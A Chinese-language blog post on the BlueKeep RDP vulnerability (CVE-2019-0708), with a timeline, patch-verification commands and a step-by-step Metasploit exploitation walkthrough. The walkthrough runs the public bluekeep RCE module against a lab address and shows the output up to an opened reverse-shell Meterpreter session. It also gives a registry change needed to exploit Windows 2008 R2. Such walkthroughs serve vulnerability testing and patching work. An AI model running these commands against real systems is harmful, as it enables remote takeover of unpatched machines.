CVE-2019-0708漏洞利用

0x00 漏洞背景

2019年5月14日微软官方发布安全补丁，修复了Windows远程桌面服务的远程代码执行漏洞，该漏洞影响了某些旧版本的Windows系统。

此漏洞是预身份验证且无需用户交互，这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机，其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序，查看、更改或删除数据，创建完全访问权限的新账户等操作。

此漏洞的相关事件时间线如下：

2019年05月14日：微软官方发布远程桌面服务远程代码执行漏洞(CVE-2019-0708)的安全通告及相应补丁。

2019年05月15日：360CERT发布安全预警以及修复指南，360安全实验室发布漏洞一键检测修复工具。

2019年05月30日：微软再次发布公告强烈建议受到CVE-2019-0708漏洞影响的用户尽快升级修复。

2019年05月31日：互联网流传出可以导致系统蓝屏崩溃的PoC代码，有企图的攻击者可以利用此PoC工具对大量存在漏洞的系统执行远程拒绝服务攻击。

2019年06月08日：Metasploit的商业版本开始提供能导致远程代码执行的漏洞利用模块。

2019年07月31日：商业漏洞利用套件Canvas加入了CVE-2019-0708的漏洞利用模块。

2019年08月14日：微软官方发布远程桌面服务远程代码执行漏洞(CVE-2019-1181/1182)的安全通告及相应补丁。

2019年09月07日：@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块，漏洞利用工具已经开始扩散，已经构成了蠕虫级的攻击威胁。

CVE-2019-0708已公开的漏洞利用工具可以极易的被普通攻击者使用，脚本化/批量化/自动化攻击将接踵而至。

0x01 漏洞修复

漏洞修复和检测的文档之前有写过

《Windows RDP远程代码执行漏洞附补丁地址(CVE-2019-0708)》

《Windows RDP漏洞检测方法(CVE-2019-0708)》

《Windows远程桌面服务远程命令执行漏洞附补丁地址(CVE-2019-1181/1182)》

补丁安装完成后，可以用命令行方式验证是否有安装成功,如果有返回安装信息，则正常

wmic qfe list|findstr "4499164 4499175 4499149 4499180 4500705"

0x02 漏洞利用验证

CVE-2019-0708

目前公开的利用代码可用于攻击 Windows 7 SP1 x64 与 Windows 2008 R2 x64，该EXP并不稳定，针对 Windows 7 SP1 x64攻击有可能导致蓝屏。

并且Windows2008 R2 x64 需要修改[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0才能攻击成功。

#使用漏洞模块
msf5 > use  exploit/windows/rdp/cve_2019_0708_bluekeep_rce

#设置目标机器IP
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.1.10

#选择目标机器架构0-4可选
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3

#开始利用
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.10:3389 - Detected RDP on 192.168.1.50:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.1.10:3389 - The target is vulnerable.
[*] 192.168.1.10:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.1.10:3389 - Surfing channels ...
[*] 192.168.1.10:3389 - Lobbing eggs ...

[*] 192.168.1.10:3389 - Forcing the USE of FREE'd object ...

[*] Sending stage (206403 bytes) to 192.168.1.10 [*]

Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.10:49158) at 2019-09-09 18:26:58 -0500

CVE-2019-1181/1182

目前尚无稳定利用版本释出

0x03 参考链接

@rapid7 Add initial exploit for CVE-2019-0708, BlueKeep #12283